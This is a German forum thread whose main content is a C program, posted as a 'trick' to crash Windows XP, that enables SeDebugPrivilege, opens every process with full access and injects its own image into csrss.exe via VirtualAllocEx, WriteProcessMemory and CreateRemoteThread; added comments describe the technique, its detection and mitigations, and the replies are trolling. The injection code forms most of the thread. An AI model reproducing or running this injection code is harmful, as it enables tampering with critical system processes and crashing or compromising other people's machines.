roflers Trickkiste, heute: windows xp crashen
-
/*
 * Forum snippet: 32-bit Windows program that copies its own image into
 * csrss.exe and starts a thread there. The post title states the intended
 * effect is crashing Windows XP.
 *
 * Reviewer summary of the visible behaviour, for analysts:
 *   1. enables SeDebugPrivilege on its own token,
 *   2. enumerates all processes and opens each with PROCESS_ALL_ACCESS,
 *   3. in the process whose first module is named "csrss.exe", allocates
 *      RWX memory, writes its whole image there and calls
 *      CreateRemoteThread on the relocated Hack() routine.
 * This is the classic remote-thread process-injection pattern (MITRE ATT&CK
 * T1055). Telemetry that covers it: process-access and remote-thread events
 * (e.g. Sysmon Event ID 10 and Event ID 8) with a critical system process as
 * the target, and use of the "Debug programs" privilege by a non-debugger.
 * Mitigation notes: SeDebugPrivilege is only present in an administrator's
 * token by default, so the technique depends on the user running as admin;
 * newer Windows versions additionally run csrss.exe as a protected process,
 * which refuses this kind of handle to ordinary callers.
 * NOTE(review): the code assumes a 32-bit build throughout (pointers are cast
 * to DWORD, IMAGE_NT_HEADERS32 is used).
 */
#include <windows.h>

/* Function-pointer types for the psapi.dll exports resolved at run time in
 * main(), plus MessageBoxA, which is called from the injected thread. */
typedef BOOL (WINAPI *tEnumProcesses)(DWORD*,DWORD,DWORD*);
typedef BOOL (WINAPI *tEnumProcessModules)(HANDLE,HMODULE*,DWORD,LPDWORD);
typedef DWORD (WINAPI *tGetModuleBaseNameA)(HANDLE,HMODULE,LPSTR,DWORD);
typedef int (WINAPI *tMessageBoxA)(HWND,const char*,const char*,UINT);

/* Rebase a local address: subtract this module's base (hinst) and add the
 * base of the remote allocation (hmem). Relies on hmem and hinst being in
 * scope at the point of use.
 * NOTE(review): "##type" pastes "(" with the type name, which is not a valid
 * token paste in standard C; presumably only accepted by the compiler the
 * author used. */
#define CHADDR(type,x) ((##type)((DWORD)(x) + (DWORD)(hmem) - (DWORD)(hinst)))

/* psapi entry points, filled in by main() via GetProcAddress. Because they are
 * resolved dynamically, they are presumably absent from the import table, so
 * import-based static triage would not show them. */
tEnumProcesses EnumProcesses;
tEnumProcessModules EnumProcessModules;
tGetModuleBaseNameA GetModuleBaseName;

/* Parameter block handed to the remote thread: the function to call and the
 * string to pass, both as addresses valid inside the target process. */
typedef struct {
    tMessageBoxA pMessageBox;
    char *txt;
} ADDRS;

void HideNT();
DWORD WINAPI Hack(ADDRS*);

ADDRS addrs;          /* copied to the target as part of the image */
char txt[] = "BSOD";  /* text and caption of the message box */
char s[1024];         /* scratch buffer for a module base name */

/* Entry point: loads psapi.dll, resolves the three enumeration functions,
 * bails out if any is missing, otherwise runs HideNT(), waits 100 ms and
 * exits. */
void main(void)
{
    HMODULE psapi = LoadLibrary("psapi.dll");
    EnumProcesses = (tEnumProcesses)GetProcAddress(psapi,"EnumProcesses");
    EnumProcessModules = (tEnumProcessModules)GetProcAddress(psapi,"EnumProcessModules");
    GetModuleBaseName = (tGetModuleBaseNameA)GetProcAddress(psapi,"GetModuleBaseNameA");
    if(!EnumProcesses || !EnumProcessModules || !GetModuleBaseName) return;
    HideNT();
    Sleep(100);
    ExitProcess(0);
}

/* Despite its name, nothing here hides anything: it enables SeDebugPrivilege,
 * walks the process list and injects this program's image into csrss.exe.
 * None of the token API return values are checked, and hToken is never
 * closed. */
void HideNT()
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;
    memset(&tkp,0,sizeof(tkp));

    /* Enable SeDebugPrivilege on the current process token. This only takes
     * effect if the token already holds the privilege. */
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
    LookupPrivilegeValue(0,SE_DEBUG_NAME, &tkp.Privileges[0].Luid);
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, 0, 0);

    /* Locate this module's PE header to learn the in-memory image size. */
    HMODULE hinst = GetModuleHandle(0);
    IMAGE_NT_HEADERS32 *pe = (IMAGE_NT_HEADERS32*)(((IMAGE_DOS_HEADER*)hinst)->e_lfanew + (DWORD)hinst);
    DWORD size = pe->OptionalHeader.SizeOfImage;

    DWORD wb;
    DWORD n;
    DWORD pr[1024];
    if(!EnumProcesses(pr,sizeof(pr),&n)) return;
    n >>= 2; /* EnumProcesses reports bytes; divide by sizeof(DWORD) for a PID count */

    DWORD cpid = GetCurrentProcessId();
    for(int i = 0; i < n; i++) {
        if(pr[i] == cpid) continue; /* skip ourselves */

        /* Every other process is opened with full access; processes that
         * refuse are skipped. This broad access request is itself a
         * detection signal. */
        HANDLE h = OpenProcess(PROCESS_ALL_ACCESS,0,pr[i]);
        if(!h) continue;

        /* Fetch only the first module (cb = 4, one 32-bit HMODULE) and its
         * base name. NOTE(review): return values are unchecked, so on failure
         * mod is uninitialised and s keeps its previous contents. */
        HMODULE mod;
        DWORD nmod;
        EnumProcessModules(h,&mod,4,&nmod);
        GetModuleBaseName(h,mod,s,1023);

        /* lstrcmpi returns non-zero on mismatch: anything that is not
         * csrss.exe is released and skipped. */
        if(lstrcmpi(s,"csrss.exe")) {
            CloseHandle(h);
            continue;
        }

        /* Read/write/execute allocation in the target, sized for the whole
         * image. */
        LPVOID hmem = VirtualAllocEx(h,0,size,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        if(!hmem) {
            CloseHandle(h);
            continue;
        }

        /* Fill the parameter block before the image is copied, so the copy in
         * the target carries these values. txt is rebased to the remote
         * allocation; MessageBoxA is stored with its local address, which
         * presumably assumes user32.dll is mapped at the same address in the
         * target (TODO confirm). */
        addrs.txt = CHADDR(char*,txt);
        addrs.pMessageBox = MessageBoxA;

        /* Copy the entire image of this program into the target. No
         * relocations are applied to the copy. */
        if(!WriteProcessMemory(h,hmem,(LPVOID)hinst,size,&wb)) {
            VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE);
            CloseHandle(h);
            continue;
        }

        /* Start a thread in the target at the rebased address of Hack(),
         * passing the rebased address of addrs. On success the process handle
         * and the returned thread handle are not closed. */
        DWORD tid;
        if(!CreateRemoteThread(h,0,0,
            (LPTHREAD_START_ROUTINE)((DWORD)Hack + (DWORD)hmem - (DWORD)hinst),
            (LPVOID)((LPVOID)((DWORD)&addrs - (DWORD)hinst + (DWORD)hmem)),0,&tid)) {
            VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE);
            CloseHandle(h);
        }
    }
}

/* Thread routine that executes inside the target process from the copied
 * image. It uses only the pointers in the ADDRS block it is given: calls the
 * stored MessageBoxA pointer with the "BSOD" string as both text and caption
 * and returns its result. */
DWORD WINAPI Hack(ADDRS *a)
{
    return a->pMessageBox(0,a->txt,a->txt,0);
}
-
Es tut mir leid, Leute ich bin so blöd! Bitte verzeiht mir meine unendliche Ignoranz!
-
rofler schrieb:
Es tut mir leid, Leute ich bin so blöd! Bitte verzeiht mir meine unendliche Ignoranz!
Bla, fake mich nicht, die Beiträge vom echten rofler (mir) zeugen von Intelligenz. Die Beiträge solcher Faker wie du hingegen zeugen höchstens von intellektueller Armut, also lass es Merker

-
registrieren soll helfen

-
Klappt einmannfrei! Vielen Dank rofler.
-
Hmm, ein Codeschnipsel ohne Kommentare, ohne Frage, dann Kommentare ohne Bezug-

Irgendwie kommt mir das alles hier nur wie Trollfutter vor.